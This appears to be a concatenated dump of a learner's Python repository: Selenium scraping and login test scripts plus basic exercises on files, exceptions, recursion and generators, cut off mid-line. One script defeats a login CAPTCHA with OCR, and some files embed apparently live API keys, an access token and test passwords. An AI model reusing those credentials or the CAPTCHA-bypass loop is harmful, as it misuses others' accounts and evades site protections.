webdriver.Chrome()\ndriver.get('https://weibo.com/')\n\ntime.sleep(15)\ndriver.implicitly_wait(100)\n#driver.find_element_by_css_selector('input[id=\"loginname\"]').send_keys('111111')\nele= WebDriverWait(driver,25,0.1).until(EC.presence_of_element_located((By.CSS_SELECTOR,'input[id=\"loginname\"]')))\nele.send_keys('12345')\ndriver.find_element_by_css_selector('div.info_list.password input[name=\"password\"]').send_keys('111111')" }, { "alpha_fraction": 0.6258503198623657, "alphanum_fraction": 0.6365403532981873, "avg_line_length": 28.97087287902832, "blob_id": "a8ae1a1a29ec01c0ccd799f9169ff5bbc083ebfa", "content_id": "c1ad6e1f344e690178afc80b2f28a263f67e8cfb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3261, "license_type": "no_license", "max_line_length": 89, "num_lines": 103, "path": "/src/test/test/work.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "\"\"\"\n2 爬取百度贴吧,将抓取到的内容 存放到csv⽂件中\n3 最终结果格式如下:\n4 data.csv\n5 标题,内容\n6 回复:听说最近耽美⽂超⽕哦《匠⼼》,孙茂顿时急了\n\n12 \"\"\"\n\n\n'''document.querySelector()'''\ndef price():\n from selenium import webdriver\n from selenium.webdriver.common.action_chains import ActionChains\n import time\n\n\n driver = webdriver.Chrome()\n\n driver.get('https://www.baidu.com')\n driver.find_element_by_class_name(\"s_ipt\").send_keys('苏宁')\n driver.find_element_by_xpath('//*[@id=\"su\"]').click()\n time.sleep(5)\n driver.find_element_by_css_selector('div.ec-pl-clean-inner-gap.ec-pc_title').click()\n #driver.maximize_window()\n time.sleep(5)\n #print(driver.current_url) #查询当前windows页面url\n #print(driver.window_handles)\n driver.switch_to.window(driver.window_handles[-1])\n #driver.switch_to.window(driver.window_handles[0]) #切换到前一个页面\n driver.find_element_by_xpath('//input[@id=\\'searchKeywords\\']').send_keys('iphone11')\n # driver.find_element_by_css_selector('div.search-keyword-box').click()\n # driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\n # driver.find_element_by_css_selector('input.search-keyword').send_keys('iphone11')\n driver.find_element_by_css_selector('input.search-btn').click()\n\n #price=driver.find_element_by_css_selector('span.def-price').text\n prices=driver.find_elements_by_css_selector('span.def-price')\n print(len(prices))\n\n time.sleep(3)\n # print(f'第一台:{prices[0].text}')\n # print(f'最后一台:{prices[-1].text}')\n lastprice = prices[-1]\n c =lastprice.location_once_scrolled_into_view\n time.sleep(10)\n #ActionChains.\n print(lastprice.text)\n driver.close()\n\ndef baidu():\n from selenium import webdriver\n from selenium.common.exceptions import NoSuchElementException\n from selenium.webdriver.common.action_chains import ActionChains\n import time\n\n driver = webdriver.Chrome()\n\n driver.get('https://www.baidu.com')\n driver.find_element_by_xpath('//a[@name=\\'tj_trtieba\\']').click()\n driver.find_element_by_xpath('//input[@name = \\'kw1\\']').send_keys('孙茂书')\n driver.find_element_by_xpath('//a[@class= \\'search_btn j_search_post\\']').click()\n time.sleep(3)\n #span.p_title div.s_post>div.p_content\n\n alltitles=[]\n def craw1_title():\n alltitles1 = driver.find_elements_by_css_selector('span.p_title')\n for ele in alltitles1:\n #print(ele.text)\n alltitles.append(ele.text)\n\n contents = []\n def craw1_content():\n contents1 = driver.find_elements_by_css_selector('div.p_content')\n for ele in contents1:\n #print(ele.text)\n contents.append(ele.text)\n\n\n\n\n\n while True:\n try:\n craw1_title()\n craw1_content()\n driver.find_element_by_css_selector('a[class=\\'next\\']').click()\n time.sleep(2)\n except NoSuchElementException:\n print('最后一页')\n driver.quit()\n break\n c={}\n for i in range(len(contents)):\n c[alltitles[i]]=contents[i]\n\n print(c)\n\n\nif __name__ == '__main__':\n price()\n #baidu()\n" }, { "alpha_fraction": 0.5512820482254028, "alphanum_fraction": 0.6132478713989258, "avg_line_length": 37.66666793823242, "blob_id": "2e685d29a8c049e313532631884a3a6690bbf7f5", "content_id": "9fca4d0b250333498a5e0bee026849502b4b5373", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 474, "license_type": "no_license", "max_line_length": 152, "num_lines": 12, "path": "/src/work/day3.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "import json\n\nwith open('haproxy.cfg','r',encoding='utf-8') as f:\n list_1=list(f.readlines())\n print(list_1)\n#{\"backend\": \"test.oldboy.org\",\"record\":{\"server\": \"100.1.7.9\",\"weight\": 20,\"maxconn\": 3000}}\njson1 = input('输入:')\ndef re(json1):\n dic_1 = json.loads(json1)\n dic_2 = 'server %s %s weight%s maxconn%s'%(dic_1['record']['server'],dic_1['record']['server'],dic_1['record']['weight'],dic_1['record']['maxconn'])\n return dic_2\nprint(re(json1))\n\n\n\n\n" }, { "alpha_fraction": 0.5425823926925659, "alphanum_fraction": 0.5425823926925659, "avg_line_length": 23.266666412353516, "blob_id": "575def1f16def7448e667c275c2d0f91eddaebfb", "content_id": "7de67e37c2de2fde6b4773f016ef401586dfef91", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 840, "license_type": "no_license", "max_line_length": 58, "num_lines": 30, "path": "/src/testcase/name_function.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "def get_formatted_name(first, last, middle=''): # 默认值写最后方\n \"\"\"生成完整姓名\"\"\"\n if middle:\n full_name = first + \" \" + middle + \" \" + last\n else:\n full_name = first + \" \" + last\n return full_name.title()\n\n\nclass AnoymoisSurey():\n \"\"\"收集匿名问卷调查\"\"\"\n\n def __init__(self, question):\n \"\"\"存储一个问题,并为记录答案准备\"\"\"\n self.question = question\n self.responses = []\n\n def show_question(self):\n \"\"\"显示问卷\"\"\"\n print(self.question)\n\n def store_response(self, new_response):\n \"\"\"存储单份调查问卷\"\"\"\n self.responses.append(new_response)\n\n def show_results(self):\n \"\"\"显示收集到的结果\"\"\"\n print(\"result:\")\n for response in self.responses:\n print(response)\n" }, { "alpha_fraction": 0.6093366146087646, "alphanum_fraction": 0.6093366146087646, "avg_line_length": 39.70000076293945, "blob_id": "a53012329cd80f235edcad1a0ac9c8fab2768191", "content_id": "9d06ff4df6b091779de3323b60251ebc4259ef26", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 425, "license_type": "no_license", "max_line_length": 57, "num_lines": 10, "path": "/src/doc_1/files_write.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "filename = 'programming.txt'\nwith open(filename,'w') as file_object: #覆盖得写\n file_object.write(\"sa\\n\")\n file_object.write(\"sjdsfaj\\n\")\nwith open(filename,'a') as file_object: #末尾添加\n file_object.write('aaaaaa\\n')\n file_object.write('bbbbbbb\\n')\nwith open('programming.txt') as file_object:\n contens = file_object.read() #读\n print(contens.rstrip())\n" }, { "alpha_fraction": 0.6331727504730225, "alphanum_fraction": 0.6572608351707458, "avg_line_length": 31.155555725097656, "blob_id": "b787369a7b530324fe64d1264fdb7bf0c54b8af0", "content_id": "9df06c1234083a0f825647806865a913d9e0bf49", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1493, "license_type": "no_license", "max_line_length": 121, "num_lines": 45, "path": "/src/test/seleium_2.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "from aip import AipOcr\nfrom selenium import webdriver\nimport time\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium.webdriver.common.action_chains import ActionChains\n\nclient = AipOcr('18237057','U7Z6NnsQNOLkdTWITItGgf1w','9cRLl0ZMWQCEkFxQeb73zC4feFsCry4e')\n\ndriver = webdriver.Chrome()\ndriver.get('http://47.100.225.199/index.php?s=/index/user/logininfo.html')\n\ndriver.find_element_by_name('accounts').send_keys('helloworld')\ndriver.find_element_by_name('pwd').send_keys('123456')\n\n\n#返回验证码\ndef get_verifycode(filePath):\n verycode = ''\n with open(filePath, 'rb') as fp:\n ret = fp.read() #返回文件流\n res= client.basicGeneral(ret) #识别后的结果\n for i in res['words_result']:\n word=i['words'].replace(' ','')\n verycode+=word\n return verycode\n\n\nwhile True:\n try:\n img = driver.find_element_by_id('form-verify-img')\n img.screenshot('./img1.png')\n t = get_verifycode('img1.png')\n verify_input = driver.find_element_by_name('verify')\n verify_input.clear()\n verify_input.send_keys(t)\n time.sleep(1)\n driver.find_element_by_css_selector('div.am-form-group.am-form-group-refreshing>button[type=\\'submit\\']').click()\n\n img.click() #更换图片\n time.sleep(1)\n ActionChains(driver).move_by_offset(0, 0).perform()\n time.sleep(1)\n except NoSuchElementException:\n break\nprint('succes')\n\n\n\n\n\n\n" }, { "alpha_fraction": 0.4811568856239319, "alphanum_fraction": 0.49255040287971497, "avg_line_length": 39.75, "blob_id": "ef6b651f3c14c15e5142a6237af642f393c3b4b7", "content_id": "0dd742d7c7f91083837ee780ad5abaa34134076c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1371, "license_type": "no_license", "max_line_length": 74, "num_lines": 28, "path": "/src/doc_1/file_reader.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "class path_1:\n#open()打开文件 传参文件名,返回一个对象\n#with在不需要访问时进行关闭,也可以使用closed,但是若程序出错导致文件损坏\n with open('pi_digits.txt') as file_object:\n contens = file_object.read() #read进行读取所有内容,结尾会多次空行\n print(contens.rstrip()) #rsplit()将结果打印成数组,rstrip()去除空行\n print(\"--------------------------------------------------\")\nclass path_2:\n with open('test\\_test_1.txt') as file_object1: # \\用于相对路径\n for line in file_object1: #逐行读取\n print(line.rstrip())\n print(\"--------------------------------------------------\")\nclass path_3:\n file_path =\"D:/ptest.txt\" # 绝对路径\n with open(file_path, encoding='utf-8') as file_object2:\n lines = file_object2.readlines() # readlines读取每一行,存储在列表中\n pi_string = ''\n for line in lines:\n print(line.rstrip())\n pi_string += line.strip() #删除空格\n print(pi_string)\n print(len(pi_string))\n print(pi_string[:52]+\".....\") #打印前52位\n birthday = input(\"输入数字:\")\n if birthday in pi_string:\n print(\"ok\")\n else:\n print(\"wrong\")\n" }, { "alpha_fraction": 0.5354131460189819, "alphanum_fraction": 0.5396289825439453, "avg_line_length": 30.210525512695312, "blob_id": "d7b567e1d0d6d0275ab26342113bc0b052af7d09", "content_id": "e585a9acdd92e9d58b6dae2a6b378b21cd4a3f1b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1300, "license_type": "no_license", "max_line_length": 81, "num_lines": 38, "path": "/src/yichang_10/division.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "try:\n print(5/0) #若此行正确,则跳过ZeroDivisionError;否则执行下方print\nexcept ZeroDivisionError:\n print('wrong')\n\nprint(\"Give me two number,and I'll divide them\")\nprint(\"Enter 'q' to quit\")\n\nwhile True: #若输入0 则报错\n first_number = input(\"\\n firstnumber: \")\n if first_number == 'q' :\n break\n second_number = input(\"secondnumber: \")\n try:\n if second_number == 'q':\n break\n answer = int(first_number)/int(second_number)\n except ZeroDivisionError:\n print(\"You are wrong!\")\n else: #依赖于try ,成功执行的代码放到else\n print(answer)\n\ndef count_word(filename):\n try:\n with open(filename) as f_ob:\n contents= f_ob.read()\n print(contents)\n except FileNotFoundError: #文件找不到,则执行下面操作\n #pass 不做任何提示错误时\n print(\"wrong\")\n else:\n words = contents.split()\n num_words = len(words)\n print(filename+\" \\n\"+str(num_words))\n\nfilenames = ['..\\doc_1\\pi_digits.txt','..\\doc_1\\programming.txt','sddjakdj.txt']\nfor folename in filenames:\n count_word(folename)\n" }, { "alpha_fraction": 0.5821596384048462, "alphanum_fraction": 0.5821596384048462, "avg_line_length": 21.85714340209961, "blob_id": "86a9a87ba0464d4b3f0578d7530553600992448a", "content_id": "e152c17b144f1cb211dc1c98df63cfb7e6211303", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 675, "license_type": "no_license", "max_line_length": 92, "num_lines": 28, "path": "/src/pytest_v/pom/edittopic.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "from user import Singdriver\n\nclass EditTopicPage:\n\n def __init__(self):\n self.driver = Singdriver()\n\n @property\n def breadcrumb_text(self):\n '''\n :return: 导航栏\n '''\n return self.driver.find_element_by_css_selector('li.active').text\n\n @property\n def error_message(self):\n return self.driver.find_element_by_css_selector('div.alert.alert-error strong').text\n\n @property\n def alert_msg_text(self):\n '''\n 切换到alert获取文字,并点击确定关闭\n :return:\n '''\n alert = self.driver.switch_to.alert\n text = alert.text\n alert.accept()\n return text" }, { "alpha_fraction": 0.5702576041221619, "alphanum_fraction": 0.6071428656578064, "avg_line_length": 32.509803771972656, "blob_id": "f8b89a7cdb2ed186af4eec345cfddd82a7e9d8dc", "content_id": "86c5dfb90c736196fbbd773648079eb993742fd2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1848, "license_type": "no_license", "max_line_length": 107, "num_lines": 51, "path": "/src/pytest_v/bussiness/test_user.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "from selenium import webdriver\nfrom selenium.webdriver import ActionChains\nfrom singdriver import Singdriver\nclass test_login:\n '''\n 用户登陆\n '''\n def __init__(self):\n self.driver = Singdriver()\n\n def test_login(self):\n \"\"\"\n 测试登陆\n :return:\n \"\"\"\n # driver = webdriver.Chrome()\n self.driver.get('http://39.107.96.138:3000/signin')\n self.driver.find_element_by_css_selector('#name').send_keys(\"testuser1\")\n self.driver.find_element_by_css_selector('#pass').send_keys('123456')\n self.driver.find_element_by_css_selector('input[value=\"登录\"]').click()\n\n # 添加断言\n # 1.登录成功应该跳转到首页\n current_url = self.driver.current_url\n assert current_url == \"http://39.107.96.138:3000/\", \"应该跳转到首页\"\n\n # 2. 用户名应该为testuser1\n username = self.driver.find_element_by_css_selector('span[class=\"user_name\"]>a[class=\"dark\"]').text\n print('sssss'+username)\n #assert username == \"testuser1\", \"登录用户名应该为testuser1\"\n\n def test_sendmail(self):\n '''\n 发帖\n :return:\n '''\n self.driver.get(\"http://39.107.96.138:3000/signin\")\n\n self.driver.find_element_by_id('name').send_keys(\"testuser1\")\n self.driver.find_element_by_id('pass').send_keys('123456')\n\n self.driver.find_element_by_css_selector('input[value=\"登录\"]').click()\n\n self.driver.get('http://39.107.96.138:3000/topic/create')\n\n edit = self.driver.find_element_by_css_selector('div.CodeMirror-scroll')\n edit.click()\n # 定义多个动作 并执行 注意:一定要在最后调用perform()\n\n action = ActionChains(self.driver)\n action.move_to_element(edit).send_keys(\"helloworld\").perform()" }, { "alpha_fraction": 0.45373666286468506, "alphanum_fraction": 0.4973309636116028, "avg_line_length": 19.071428298950195, "blob_id": "978b54be4f3cd38eb599276ebf775142b87066f2", "content_id": "1262dec3d0d7e6cac4b54628baeb495122a2796d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1142, "license_type": "no_license", "max_line_length": 76, "num_lines": 56, "path": "/src/learn/day4_递归.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "def cale(n):\n print(n)\n if n / 2 > 1:\n return cale(n / 2)\n print('N:', n)\n\n\ncale(100)\n\n\ndef cale1(n):\n print(n)\n if n / 2 > 1:\n res = cale1(n / 2) # res = 10 5=5(res =5) 2.5(res =2.5) 1.25\n print('res:', res)\n\n print('N:', n)\n return n\n\n\ncale1(10)\n\n'''斐波那契数列'''\n\n\ndef fun(arg1, arg2, stop):\n if arg1 == 0:\n print(arg1, '\\n', arg2)\n arg3 = arg1 + arg2\n print(arg3)\n if arg3 < stop:\n fun(arg2, arg3, stop)\n\n\n'''二分法'''\n\n\ndef binary_search(date_source, find_n):\n mid = int(len(date_source) / 2)\n if len(date_source) >= 1:\n if date_source[mid] > find_n:\n print('data in left of [%s]' % date_source[mid])\n binary_search(date_source[:mid], find_n)\n elif date_source[mid] < find_n:\n print('data in right of [%s]' % date_source[mid])\n binary_search(date_source[mid:], find_n)\n else:\n print('found fin_s', date_source[mid])\n else:\n print('cannot find...')\n\n\nif __name__ == '__main__':\n date = list(range(1, 60000, 4))\n # print(date)\n binary_search(date, 1)\n" }, { "alpha_fraction": 0.7580645084381104, "alphanum_fraction": 0.774193525314331, "avg_line_length": 24, "blob_id": "91d8e3864414e60593916b4e7c229f21ae07f22f", "content_id": "c6c62c76716540de7ac36f7328a377d22afb3629", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 124, "license_type": "no_license", "max_line_length": 41, "num_lines": 5, "path": "/src/test_9_6/test.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "from test_9_6 import Restaurant\n\nname = Restaurant('ice-restaurant','ice')\nname.describe_restaurant()\nname.open_restaurant()" }, { "alpha_fraction": 0.7313961982727051, "alphanum_fraction": 0.7455705404281616, "avg_line_length": 37.16216278076172, "blob_id": "23128619c22db0bf034b4c30b52781304f831f87", "content_id": "35cf1655a42e5c38d4b526e9e3e66c63ccbd3c5e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1461, "license_type": "no_license", "max_line_length": 85, "num_lines": 37, "path": "/src/test/test/__init__.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "from selenium import webdriver\nfrom selenium.webdriver.common.action_chains import ActionChains\nimport time\n\ndriver = webdriver.Chrome()\n\ndriver.get('https://www.baidu.com')\ndriver.find_element_by_class_name(\"s_ipt\").send_keys('苏宁')\ndriver.find_element_by_xpath('//*[@id=\"su\"]').click()\ntime.sleep(5)\ndriver.find_element_by_css_selector('div.ec-pl-clean-inner-gap.ec-pc_title').click()\n# driver.maximize_window()\ntime.sleep(5)\n# print(driver.current_url) #查询当前windows页面url\n# print(driver.window_handles)\ndriver.switch_to.window(driver.window_handles[-1])\n#driver.switch_to.window(driver.window_handles[0]) # 切换到前一个页面\ndriver.find_element_by_xpath('//input[@id=\\'searchKeywords\\']').send_keys('iphone11')\n# driver.find_element_by_css_selector('div.search-keyword-box').click()\n# driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\n# driver.find_element_by_css_selector('input.search-keyword').send_keys('iphone11')\ndriver.find_element_by_css_selector('input.search-btn').click()\n\n#price=driver.find_element_by_css_selector('span.def-price').text\nprices = driver.find_elements_by_css_selector('span.def-price')\ndriver.execute_script(\"window.scrollBy(0,4000)\")\n\nprint(len(prices))\n\ntime.sleep(3)\n# print(f'第一台:{prices[0].text}')\n# print(f'最后一台:{prices[-1].text}')\nlastprice = prices[-1]\nc = lastprice.location_once_scrolled_into_view\ntime.sleep(10)\n# ActionChains.\nprint(lastprice.text)" }, { "alpha_fraction": 0.6169611215591431, "alphanum_fraction": 0.6402826905250549, "avg_line_length": 19.521739959716797, "blob_id": "5416fdbf4c5368fbb1a1bb520dcbfc56373f8ba5", "content_id": "46aa4f4a404fe22213098db572b81546cf7e6e87", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1601, "license_type": "no_license", "max_line_length": 98, "num_lines": 69, "path": "/src/pytest_v/testcase/test_login.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "from selenium import webdriver\nfrom selenium.webdriver import ActionChains\nfrom singdriver import Singdriver\nfrom user import UserAction\nimport utils\nimport os\nuseraction = UserAction()\n\ndriver = Singdriver()\n\ndef setup_module():\n '''\n 执行案例前的操作\n :return:\n '''\n useraction.user_login()\n\ndef teardown_module():\n '''\n 执行所有测试用例后的操作\n :return:\n '''\n driver.quit()\n\ndef teardown():\n '''\n 执行每条测试用例后,截屏\n :return:\n '''\n dirname = utils.get_screen_shot()\n filename = utils.get_png_file_name()\n f = os.path.join(dirname,filename)\n driver.save_screenshot(f+'.png')\n\n\ndef test_login():\n \"\"\"\n 测试登陆\n :return:\n \"\"\"\n #useraction.user_login()\n\n # 添加断言\n # 1.登录成功应该跳转到首页\n current_url = driver.current_url\n assert current_url==\"http://39.107.96.138:3000/\",\"应该跳转到首页\"\n\n # 2. 用户名应该为testuser1\n username = driver.find_element_by_css_selector('span[class=\"user_name\"]>a[class=\"dark\"]').text\n #print('sssss'+username)\n assert username == \"testuser1\",\"登录用户名应该为testuser1\"\n\n\n\ndef test_register():\n '''\n 发帖\n :return:\n '''\n #driver = webdriver.Chrome()\n\n driver.get('http://39.107.96.138:3000/topic/create')\n\n edit = driver.find_element_by_css_selector('div.CodeMirror-scroll')\n edit.click()\n # 定义多个动作 并执行 注意:一定要在最后调用perform()\n\n action = ActionChains(driver)\n action.move_to_element(edit).send_keys(\"helloworld\").perform()" }, { "alpha_fraction": 0.47974684834480286, "alphanum_fraction": 0.49873417615890503, "avg_line_length": 17.83333396911621, "blob_id": "c77752bc689eef201c2bf607432e6dd5ef485b75", "content_id": "27a141b376f2c7529e6b32cdf6a983045d97d186", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1072, "license_type": "no_license", "max_line_length": 66, "num_lines": 42, "path": "/src/Unit2/9-19.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "'''1、用户输入一个数值,请判断用户输入的是否为偶数?\n是偶数输出True,不是输出False(提示:input输入的不管是什么,\n都会被转换成字符串,自己扩展,想办法将字符串转换为数值类型,再做判段)'''\n\n# class print_num() :\n# num = input('num = ')\n# try:\n# num = int(num)\n# if num%2 == 0 :\n# print('true')\n# else:\n# print('false')\n# except Exception:\n# print(\"格式错误\")\n\n'''卖橘子的计算器:写一段代码,提示用户输入橘子的价格,然后随机生成购买的斤数(5到10斤之间),最后计算出应该支付的金额!'''\n#\n# def foo():\n# print(\"starting...\")\n# while True:\n# res = yield 4\n# print(\"res:\", res)\n# g = foo()\n# print(next(g))\n# # print(\"*\" * 20)\n# print(next(g))\n\ndef fib(max):\n n,a,b=0,0,1\n while n<max:\n yield b\n a,b=b,a+b\n n = n+1\n\nfor n in fib(5):\n print(n)\n\n\n\n# if __name__ == '__main__':\n# # print_num\n# count_friut.fib(9)" }, { "alpha_fraction": 0.5879396796226501, "alphanum_fraction": 0.5879396796226501, "avg_line_length": 18.850000381469727, "blob_id": "e82c4923b266c4073dfba650b52fc8eb1b9595c4", "content_id": "7c7975a3e05ec8365171ae1b940a9d4b4173a35e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 466, "license_type": "no_license", "max_line_length": 63, "num_lines": 20, "path": "/src/pytest_v/common/utils.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "import os\nimport time\n\n\ndef get_screen_shot():\n '''\n 项目根目录下不存在screnshoots目录,那就创建一个\n :return: screenshots的绝对路径\n '''\n if os.path.isdir('../screnshoots') is False:\n os.mkdir('../screnshoots')\n return os.path.abspath('../screnshoots')\n\n\ndef get_png_file_name():\n '''\n 返回文件名年_月_日_时_分_秒\n :return:\n '''\n return time.strftime('%Y_%m_%d_%H_%M_%S', time.localtime())\n\n" }, { "alpha_fraction": 0.6744759678840637, "alphanum_fraction": 0.6954377293586731, "avg_line_length": 35.727272033691406, "blob_id": "bfa1fcde282960c0d09f82354dc6ab175a0e37d5", "content_id": "470e5f763c69f4f451c5708587336a5736214cf9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 817, "license_type": "no_license", "max_line_length": 160, "num_lines": 22, "path": "/src/test/webtest/test_1.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "# div.DiscoveryNews h2>span\n# //div[@id=\"col-discovery\"]//h2/span[1]\n\nfrom selenium import webdriver\nfrom selenium.common.exceptions import NoSuchElementException\nimport time\n\n#滚动\ndriver = webdriver.Chrome()\ndriver.get('http://news.baidu.com/')\njs1 = 'window.scrollTo(0,5000)'\njs2 = 'document.querySelector(\"#footerwrapper > div.bottombar > div > div.bot-left > div.qrcode-container.clearfix > div.img-container > img\").scrollIntoView()'\n\nwhile True:\n try:\n text = driver.find_element_by_css_selector('div.DiscoveryNews h2>span').text\n print(text)\n break\n except NoSuchElementException:\n #driver.find_element_by_xpath('//*[@id=\"footerwrapper\"]/div[1]/div/div[1]/div[2]/div[1]/img').location_once_scrolled_into_view()\n driver.execute_script(js2)\n time.sleep(2)\n\n\n\n" }, { "alpha_fraction": 0.5158265233039856, "alphanum_fraction": 0.5357561707496643, "avg_line_length": 16.77083396911621, "blob_id": "3cc35f32b1e1d185c768d4e0421873d1c3b291fc", "content_id": "0f21660aa4ea450d786275d277043fed8456fcc8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 989, "license_type": "no_license", "max_line_length": 57, "num_lines": 48, "path": "/src/learn/day4_迭代器.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "name = iter(['alex', 'jack', 'lisa']) # 迭代器 使用next每次取一个数\nprint(name)\nprint(name.__next__())\nprint(name.__next__())\nprint(name.__next__())\n\n\n# 生成器\ndef cash_money(amount):\n while amount > 0:\n amount -= 100\n yield 100\n print('又来取钱了')\n\n\natm = cash_money(500) # 函数是生成器,返回迭代器,调用使用__next__\nprint(type(atm))\nprint(atm.__next__())\nprint(atm.__next__())\nprint('大保健')\nprint(atm.__next__())\nprint(atm.__next__())\n\n# 异步\nimport time\n\n\ndef consumer(name):\n print('%s is 准备吃包子' % name)\n while True:\n baozi = yield\n print('包子%s来了,被%s吃了' % (baozi, name))\n\n\ndef producer(name):\n c = consumer('A')\n c2 = consumer('B')\n c.__next__()\n c2.__next__()\n print('开始做包子')\n for i in range(10):\n # time.sleep(1)\n print('做了2个包子')\n c.send(i) # 将值发送给yield\n c2.send(i)\n\n\nproducer('alex')\n" }, { "alpha_fraction": 0.5851239562034607, "alphanum_fraction": 0.5917355418205261, "avg_line_length": 24.25, "blob_id": "9f6d19abeeead59b118cc80c75ac7993a8056c22", "content_id": "7e5e4ce1e24029dec0d8d8926307cecc1cfbaf07", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 613, "license_type": "no_license", "max_line_length": 80, "num_lines": 24, "path": "/src/test/testng.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "import unittest\nfrom test1 import result\n\nclass NameTestCase(unittest.TestCase): # 测试用例\n def setUp(self):\n pass\n\n def test_get_result(self):\n params = {'page': 1}\n response = result('get', '/topics', params)\n self.assertEqual(True,response['success'])\n\n def test_post_result(self):\n params = {'accessToken': '47bac9bd-0c3f-4654-8aaa-171662bd3f45', 'title': 'test11', 'content': 'yyyyy'}\n response = result('post', '/topics', params)\n print(response)\n self.assertEqual('error', response)\n\n\n\n def tearDown(self):\n pass\nif __name__ == '__main__':\n NameTestCase" }, { "alpha_fraction": 0.6384615302085876, "alphanum_fraction": 0.6384615302085876, "avg_line_length": 31.75, "blob_id": "caac5a510085a7ae398194437e63d02bdeffe28c", "content_id": "704cc2e08936634e5e814842d61eb7d6b78d5239", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 130, "license_type": "no_license", "max_line_length": 45, "num_lines": 4, "path": "/src/doc_1/test/test1.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "with open('../pi_digits.txt') as file_object:\n data = file_object.readline()\n contens =[i for i in data ]\n print(contens)" }, { "alpha_fraction": 0.556745171546936, "alphanum_fraction": 0.5695931315422058, "avg_line_length": 23.63157844543457, "blob_id": "3c8be0593c961ddbefcd778916e6e674d68446a9", "content_id": "f2920818182cf2677089a5bd0fe4edd02be45742", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 507, "license_type": "no_license", "max_line_length": 47, "num_lines": 19, "path": "/src/pytest_v/common/singdriver.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "from selenium import webdriver\n\nclass Singdriver:\n\n __instance = None\n\n def __new__(cls, *args, **kwargs):\n '''new 创建对象时调用,单例模式统一管理浏览器实例'''\n if cls.__instance is None:\n cls.__instance = webdriver.Chrome()\n cls.__instance.implicitly_wait(10)\n cls.__instance.maximize_window()\n return cls.__instance\n\n# if __name__ == '__main__':\n# dir1 = Singdriver()\n# dir2 = Singdriver()\n# print(dir2)\n# print(dir2)" }, { "alpha_fraction": 0.39245930314064026, "alphanum_fraction": 0.4721508026123047, "avg_line_length": 21.882352828979492, "blob_id": "fe21da298071f19aeb8ff90c89eead6c3ea18ff2", "content_id": "d5154fb7beb72bcad91a26ffbcd500cdf52ac299", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1279, "license_type": "no_license", "max_line_length": 54, "num_lines": 51, "path": "/src/learn/day_4数组旋转_正则.py", "repo_name": "qianpeng-qp/pytest1", "src_encoding": "UTF-8", "text": "'''二维数组,将数组旋转'''\n\n'''\n[0, 1, 2, 3]\n[0, 1, 2, 3]\n[0, 1, 2, 3]\n[0, 1, 2, 3]\n\n---------------------------\n[0, 0, 0, 0]\n[1, 1, 1, 1]\n[2, 2, 2, 2]\n[3, 3, 3, 3]\n'''\ndata = [[col for col in range(4)] for row in range(4)]\nprint(data)\nprint('-----------------------------')\nfor row in data:\n print(row)\n\nprint('--------------------------------')\n\nfor r_index, row in enumerate(data):\n # print(row)\n for c_index in range(r_index, len(row)):\n tem = data[c_index][r_index]\n data[c_index][r_index] = row[c_index]\n data[r_index][c_index] = tem\n\nfor i in data:\n print(i)\n\n'''正则'''\nimport re\n\nm = ('abc', 'abcf')\nm = re.match('[0-9][0-9]', '75abcf')\nm = re.match('[0-9]{0,10}', '75abcf') # 0-10次\nm = re.match('[0-9]{10}', '75abcf') # 10次\nm = re.findall('[0-9]{1,10}', '75ab9cf') # 